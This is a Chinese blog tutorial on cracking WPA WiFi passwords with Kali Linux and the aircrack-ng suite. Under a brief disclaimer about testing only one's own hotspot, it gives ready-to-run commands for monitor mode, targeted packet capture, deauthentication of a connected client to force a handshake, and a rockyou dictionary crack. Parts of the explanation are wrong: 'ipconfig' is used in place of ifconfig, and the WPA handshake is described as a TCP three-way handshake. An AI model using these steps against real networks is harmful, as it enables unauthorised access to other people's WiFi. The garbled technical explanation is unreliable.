kali wifi破解


前言

未经允许私自破解他人wifi密码,属于违法行为,我这里使用自己的wifi热点作为学习和测试,知道了破解方法才知道如何防范。

前期准备

无线网卡(免驱版,且支持监听)

虚拟机中安装kali

wifi破解过程

1.将usb无线网卡连接到虚拟机

插入网卡,虚拟机会检测到usb,选择连接到虚拟机。

打开终端输入ipconfig查看网卡是否连接成功,有wlan0表示usb无线网卡连接成功。

image-20210817113626334

2.开启网卡监听

airmon-ng start wlan0

image-20210817120113742

3.查看网卡信息

iwconfig

开启监听模式之后,无线接口wlan0变成了wlan0mon,就成功开启了监听。

image-20210817120340695

4.扫描附近wifi网络

airodump-ng wlan0mon

ESSIDAAAAA的是我的随身wifi热点,要破解的目标。找到目标后ctrl+c结束任务image-20210817121419798

BSSID:代表为MAC地址

PWR:为信号强弱的程度,数值越小信号越强

DATA:为数据量,越大代表使用的人越多

CH:为信道频率(频道)

ESSID:为WiFi的名称(中文有可能会乱码)

5.根据信道频率抓包

airodump-ng --bssid BSSID的值 -c 信道频率 -w 抓包存储路径 wlan0mon
airodump-ng --bssid 40:45:DA:EE:69:17 -c 11 -w /home/wifi wlan0mon

image-20210817122635787

6.强制连接到wifi的设备重连路由器

aireplay-ng -0 20 -a 40:45:DA:EE:69:17 -c C4:E1:A1:BC:D8:6F -D wlan0mon

攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码,

image-20210817123831705

当抓取数据包的终端中出现WAP handshake 则便是抓包成功,按ctrl+c停止2个终端。

image-20210817124704542

7.使用字典破解密码

可以使用kali自带的字典,也可以用自己收集的字典,使用kali的字典,首先要解压字典路径为:/usr/share/wordlists/rockyou.txt.gz

gzip -d /usr/share/wordlists/rockyou.txt.gz

进入抓包存储的路径,wifi-01.cap就是我们抓到的数据包。

image-20210817125247984

对其进行破解

aircrack-ng -w /usr/share/wordlists/rockyou.txt wifi-01.cap

KEY FOUND[***]破解成功,KEY NOT FOUND代表没有破解成功

image-20210817125716861


文章作者: Kz_404
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Kz_404 !
评论
  目录